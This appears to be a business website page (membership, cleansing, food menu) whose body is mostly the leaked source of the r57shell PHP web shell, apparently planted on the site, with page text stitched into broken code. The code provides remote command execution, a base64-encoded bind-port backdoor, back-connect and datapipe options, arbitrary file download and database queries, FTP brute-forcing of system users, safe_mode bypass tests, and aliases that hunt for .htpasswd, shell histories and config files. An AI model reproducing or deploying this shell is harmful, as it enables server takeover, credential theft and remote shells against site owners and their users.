My Account    
 
 
MEMBERSHIP
CLEANSING
FOOD MENU
EVENTS
NEWS
CONTACT US
 
 
"; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } function DirFiles($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (FALSE !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(!is_dir($dir."/".$file)) { if($types) { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,@explode(';',$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } function DirFilesWide($dir) { $files = Array(); $dirs = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) { $file = @strtoupper($file); $dirs[$file] = '<DIR>'; } else $files[$file] = @filesize($dir."/".$file); } } @closedir($handle); @ksort($dirs); @ksort($files); $files = @array_merge($dirs,$files); } return $files; } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } function DirPrintHTMLHeaders($dir) { $pockets = ''; $handle = @opendir($dir) or die("Can't open directory $dir"); echo "
    n"; while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) { echo "
  • [ $file ]
    • n"; DirPrintHTMLHeaders($dir."/".$file); } else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,array('.htm','.html'))) { $header = '-=None=-'; $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); for($a=0;$a".$header."n"; } } } } echo "
n"; @closedir($handle); } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = 'b'.$v.'b'; $words = '('.@implode($delim,$qq).')'; $pattern = "/".$words."/"; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"\1",$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludC
"; } echo "
"; } echo "

Counselors

fgfgfg


"; } echo "
$v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) { header('WWW-Authenticate: Basic realm="r57shell"'); header('HTTP/1.0 401 Unauthorized'); exit("r57shell : Access Denied"); } } $head = ' r57shell '; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name="".$attach['name'].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach['content']))."rn"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } if(isset($_GET['img'])&&!empty($_GET['img'])) { $images = array(); $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; @ob_clean(); header("Content-type: image/gif"); echo base64_decode($images[$_GET['img']]); die(); } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } if ($_POST['cmd']=="db_query") { echo $head; switch($_POST['db']) { case 'MySQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
"; $res = @mysql_query($query,$db); $error = @mysql_error($db); if($error) { echo "
Error : ".$error."

"; } else { if (@mysql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($res))) { $keys = @implode(" 		 ", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode("  ",$values); $sql2 .= "
 ".$values." 
"; $sql = ""; $sql .= $sql2; echo $sql; echo "
 ".$keys." 

"; } else { if(($rows = @mysql_affected_rows($db))>=0) { echo "
affected rows : ".$rows."

"; } } } @mysql_free_result($res); } } @mysql_close($db); } else echo "
Can't connect to MySQL server
"; break; case 'MSSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
"; $res = @mssql_query($query,$db); if (@mssql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mssql_fetch_assoc($res))) { $keys = @implode(" 
 ", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode("  ",$values); $sql2 .= "
 ".$values." 
"; $sql = ""; $sql .= $sql2; echo $sql; echo "
 ".$keys." 

"; } /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "
affected rows : ".$rows."

"; } else { echo "
Error : ".$error."

"; }} */ @mssql_free_result($res); } } @mssql_close($db); } else echo "
Can't connect to MSSQL server
"; break; case 'PostgreSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; $db = @pg_connect($str); if($db) { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
"; $res = @pg_query($db,$query); $error = @pg_errormessage($db); if($error) { echo "
Error : ".$error."

"; } else { if (@pg_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @pg_fetch_assoc($res))) { $keys = @implode(" 		 ", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode("  ",$values); $sql2 .= "
 ".$values." 
"; $sql = ""; $sql .= $sql2; echo $sql; echo "
 ".$keys." 

"; } else { if(($rows = @pg_affected_rows($res))>=0) { echo "
affected rows : ".$rows."

"; } } } @pg_free_result($res); } } @pg_close($db); } else echo "
Can't connect to PostgreSQL server
"; break; case 'Oracle': $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); if(($error = @ocierror())) { echo "
Can't connect to Oracle server.
".$error['message']."
"; } else { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "Query#".$num." : ".htmlspecialchars($query)."
"; $stat = @ociparse($db, $query); @ociexecute($stat); if(($error = @ocierror())) { echo "
Error : ".$error['message']."

"; } else { $rowcount = @ocirowcount($stat); if($rowcount != 0) {echo "
affected rows : ".$rowcount."

";} else { echo ""; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ""; } echo ""; while(ocifetch($stat)) { echo ""; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ""; } echo ""; } echo "
 ".htmlspecialchars(@ocicolumnname($stat, $j))." 
 ".htmlspecialchars(@ociresult($stat, $j))." 

"; } @ocifreestatement($stat); } } } @ocilogoff($db); } break; } echo "
"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "



"; echo "
"; echo "
[ BACK ]
"; die(); } if(isset($_GET['delete'])) { @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); } if(isset($_GET['tmp'])) { @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); } if(isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return 'no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '', true); return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '', ''; foreach (@ini_get_all() as $key=>$value) { $r .= ''; } echo $r; echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; } echo "
[ BACK ]
"; die(); } if(isset($_GET['cpu'])) { echo $head; echo '
CPU
'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; echo "
[ BACK ]
"; die(); } if(isset($_GET['mem'])) { echo $head; echo '
MEMORY
'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; echo "
[ BACK ]
"; die(); } $lang=array( 'ru_text1' =>'Выполненная команда', 'ru_text2' =>'Выполнение команд на сервере', 'ru_text3' =>'Выполнить команду', 'ru_text4' =>'Рабочая директория', 'ru_text5' =>'Загрузка файлов на сервер', 'ru_text6' =>'Локальный файл', 'ru_text7' =>'Алиасы', 'ru_text8' =>'Выберите алиас', 'ru_butt1' =>'Выполнить', 'ru_butt2' =>'Загрузить', 'ru_text9' =>'Открытие порта и привязка его к /bin/bash', 'ru_text10'=>'Открыть порт', 'ru_text11'=>'Пароль для доступа', 'ru_butt3' =>'Открыть', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-адрес', 'ru_text14'=>'Порт', 'ru_butt4' =>'Выполнить', 'ru_text15'=>'Загрузка файлов с удаленного сервера', 'ru_text16'=>'Использовать', 'ru_text17'=>'Удаленный файл', 'ru_text18'=>'Локальный файл', 'ru_text19'=>'Exploits', 'ru_text20'=>'Использовать', 'ru_text21'=>'Новое имя', 'ru_text22'=>'datapipe', 'ru_text23'=>'Локальный порт', 'ru_text24'=>'Удаленный хост', 'ru_text25'=>'Удаленный порт', 'ru_text26'=>'Использовать', 'ru_butt5' =>'Запустить', 'ru_text28'=>'Работа в safe_mode', 'ru_text29'=>'Доступ запрещен', 'ru_butt6' =>'Сменить', 'ru_text30'=>'Просмотр файла', 'ru_butt7' =>'Вывести', 'ru_text31'=>'Файл не найден', 'ru_text32'=>'Выполнение PHP кода', 'ru_text33'=>'Проверка возможности обхода ограничений open_basedir через функции cURL', 'ru_butt8' =>'Проверить', 'ru_text34'=>'Проверка возможности обхода ограничений safe_mode через функцию include', 'ru_text35'=>'Проверка возможности обхода ограничений safe_mode через загрузку файла в mysql', 'ru_text36'=>'База', 'ru_text37'=>'Логин', 'ru_text38'=>'Пароль', 'ru_text39'=>'Таблица', 'ru_text40'=>'Дамп таблицы базы данных', 'ru_butt9' =>'Дамп', 'ru_text41'=>'Сохранить в файле', 'ru_text42'=>'Редактирование файла', 'ru_text43'=>'Редактировать файл', 'ru_butt10'=>'Сохранить', 'ru_butt11'=>'Редактировать', 'ru_text44'=>'Редактирование файла невозможно! Доступ только для чтения!', 'ru_text45'=>'Файл сохранен', 'ru_text46'=>'Просмотр phpinfo()', 'ru_text47'=>'Просмотр настроек php.ini', 'ru_text48'=>'Удаление временных файлов', 'ru_text49'=>'Удаление скрипта с сервера', 'ru_text50'=>'Информация о процессоре', 'ru_text51'=>'Информация о памяти', 'ru_text52'=>'Текст для поиска', 'ru_text53'=>'Искать в папке', 'ru_text54'=>'Поиск текста в файлах', 'ru_butt12'=>'Найти', 'ru_text55'=>'Только в файлах', 'ru_text56'=>'Ничего не найдено', 'ru_text57'=>'Создать/Удалить Файл/Директорию', 'ru_text58'=>'Имя', 'ru_text59'=>'Файл', 'ru_text60'=>'Директорию', 'ru_butt13'=>'Создать/Удалить', 'ru_text61'=>'Файл создан', 'ru_text62'=>'Директория создана', 'ru_text63'=>'Файл удален', 'ru_text64'=>'Директория удалена', 'ru_text65'=>'Создать', 'ru_text66'=>'Удалить', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'Команда', 'ru_text69'=>'Параметр1', 'ru_text70'=>'Параметр2', 'ru_text71'=>"Второй параметр команды:rn- для CHOWN - имя нового пользователя или его UID (числом) rn- для команды CHGRP - имя группы или GID (числом) rn- для команды CHMOD - целое число в восьмеричном представлении (например 0777)", 'ru_text72'=>'Текст для поиска', 'ru_text73'=>'Искать в папке', 'ru_text74'=>'Искать в файлах', 'ru_text75'=>'* можно использовать регулярное выражение', 'ru_text76'=>'Поиск текста в файлах с помощью утилиты find', 'ru_text77'=>'Просмотр структуры базы данных', 'ru_text78'=>'Показывать таблицы', 'ru_text79'=>'Показывать столбцы', 'ru_text80'=>'Тип', 'ru_text81'=>'Сеть', 'ru_text82'=>'Базы данных', 'ru_text83'=>'Выполнение SQL запроса', 'ru_text84'=>'SQL запрос', 'ru_text85'=>'Проверка возможности обхода ограничений safe_mode через выполнение команд в MSSQL сервере', 'ru_text86'=>'Скачивание файла с сервера', 'ru_butt14'=>'Скачать', 'ru_text87'=>'Загрузка файлов с удаленного ftp-сервера', 'ru_text88'=>'FTP-сервер:порт', 'ru_text89'=>'Файл на ftp сервере', 'ru_text90'=>'Режим передачи', 'ru_text91'=>'Архивировать в', 'ru_text92'=>'без архивации', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-брутфорс', 'ru_text95'=>'Список пользователей', 'ru_text96'=>'Не удалось получить список пользователей', 'ru_text97'=>'Проверено комбинаций: ', 'ru_text98'=>'Удачных подключений: ', 'ru_text99'=>'* в качестве логина и пароля используется имя пользователя из /etc/passwd', 'ru_text100'=>'Отправка файлов на удаленный фтп сервер', 'ru_text101'=>'Использовать также перевернутое (user -> resu) имя пользователя в качестве пароля', 'ru_text102'=>'Почта', 'ru_text103'=>'Отправка письма', 'ru_text104'=>'Отправка файла на почтовый ящик', 'ru_text105'=>'Кому', 'ru_text106'=>'От', 'ru_text107'=>'Тема', 'ru_butt15'=>'Отправить', 'ru_text108'=>'Текст письма', 'ru_text109'=>'Свернуть', 'ru_text110'=>'Развернуть', /* --------------------------------------------------------------- */ 'eng_text1' =>'Executed command', 'eng_text2' =>'Execute command on server', 'eng_text3' =>'Run command', 'eng_text4' =>'Work directory', 'eng_text5' =>'Upload files on server', 'eng_text6' =>'Local file', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_butt1' =>'Execute', 'eng_butt2' =>'Upload', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_butt3' =>'Bind', 'eng_text12'=>'back-connect', 'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_butt4' =>'Connect', 'eng_text15'=>'Upload files from remote server', 'eng_text16'=>'With', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Use', 'eng_text21'=>' New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Use', 'eng_butt5' =>'Run', 'eng_text28'=>'Work in safe_mode', 'eng_text29'=>'ACCESS DENIED', 'eng_butt6' =>'Change', 'eng_text30'=>'Cat file', 'eng_butt7' =>'Show', 'eng_text31'=>'File not found', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions', 'eng_butt8' =>'Test', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database', 'eng_text37'=>'Login', 'eng_text38'=>'Password', 'eng_text39'=>'Table', 'eng_text40'=>'Dump database table', 'eng_butt9' =>'Dump', 'eng_text41'=>'Save dump in file', 'eng_text42'=>'Edit files', 'eng_text43'=>'File for edit', 'eng_butt10'=>'Save', 'eng_text44'=>'Can't edit file! Only read access!', 'eng_text45'=>'File saved', 'eng_text46'=>'Show phpinfo()', 'eng_text47'=>'Show variables from php.ini', 'eng_text48'=>'Delete temp files', 'eng_butt11'=>'Edit file', 'eng_text49'=>'Delete script from server', 'eng_text50'=>'View cpu info', 'eng_text51'=>'View memory info', 'eng_text52'=>'Find text', 'eng_text53'=>'In dirs', 'eng_text54'=>'Find text in files', 'eng_butt12'=>'Find', 'eng_text55'=>'Only in files', 'eng_text56'=>'Nothing :(', 'eng_text57'=>'Create/Delete File/Dir', 'eng_text58'=>'name', 'eng_text59'=>'file', 'eng_text60'=>'dir', 'eng_butt13'=>'Create/Delete', 'eng_text61'=>'File created', 'eng_text62'=>'Dir created', 'eng_text63'=>'File deleted', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Create', 'eng_text66'=>'Delete', 'eng_text67'=>'Chown/Chgrp/Chmod', 'eng_text68'=>'Command', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UIDrn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", 'eng_text72'=>'Text for find', 'eng_text73'=>'Find in folder', 'eng_text74'=>'Find in files', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text77'=>'Show database structure', 'eng_text78'=>'show tables', 'eng_text79'=>'show columns', 'eng_text80'=>'Type', 'eng_text81'=>'Net', 'eng_text82'=>'Databases', 'eng_text83'=>'Run SQL query', 'eng_text84'=>'SQL query', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Download files from server', 'eng_butt14'=>'Download', 'eng_text87'=>'Download files from remote ftp-server', 'eng_text88'=>'FTP-server:port', 'eng_text89'=>'File on ftp', 'eng_text90'=>'Transfer mode', 'eng_text91'=>'Archivation', 'eng_text92'=>'without archivation', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Users list', 'eng_text96'=>'Can't get users list', 'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'* use username from /etc/passwd for ftp login and password', 'eng_text100'=>'Send file to remote ftp server', 'eng_text101'=>'Use reverse (user -> resu) login for password', 'eng_text102'=>'Mail', 'eng_text103'=>'Send email', 'eng_text104'=>'Send file to email', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_butt15'=>'Send', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Show', ); /* Алиасы команд Позволяют избежать многократного набора одних и тех-же команд. ( Сделано благодаря моей природной лени ) Вы можете сами добавлять или изменять команды. */ $aliases=array( 'find suid files'=>'find / -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', 'find config* files'=>'find / -type f -name "config*"', 'find config* files in current dir'=>'find . -type f -name "config*"', 'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all service.pwd files'=>'find / -type f -name service.pwd', 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find all .bash_history files'=>'find / -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find all .mysql_history files'=>'find / -type f -name .mysql_history', 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', 'list file attributes on a Linux second extended file system'=>'lsattr -va', 'show opened ports'=>'netstat -an | grep -i listen', '----------------------------------------------------------------------------------------------------'=>'ls -la' ); $table_up1 = "
:: "; $table_up2 = " ::
"; $table_up3 = ""; $arrow = " и"; $lb = "["; $rb = "]"; $font = ""; $ts = "
"; $table_end1 = "
"; $te = "
"; $fs = "
"; $fe = "
"; if(isset($_GET['users'])) { if(!$users=get_users()) { echo "
".$lang[$language.'_text96']."
"; } else { echo '
'; foreach($users as $user) { echo $user."
"; } echo '
'; } echo "
[ BACK ]
"; die(); } if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } $dir = @getcwd(); $windows = 0; $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $windows = 1; } else { $unix = 1; } } } if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= ""; foreach($res as $file=>$v) { $r .= ""; $r .= ""; foreach($v as $a=>$b) { $r .= ""; $r .= ""; $r .= ""; $r .= "n"; } } $r .= "
".ws(3); $r .= ($windows)? str_replace("/","\",$file) : $file; $r .= ""; $r .= "
".$a."".ws(2).$b."
"; echo $r; } else { echo "

".$lang[$language.'_text56']."

"; } echo "
[ BACK ]
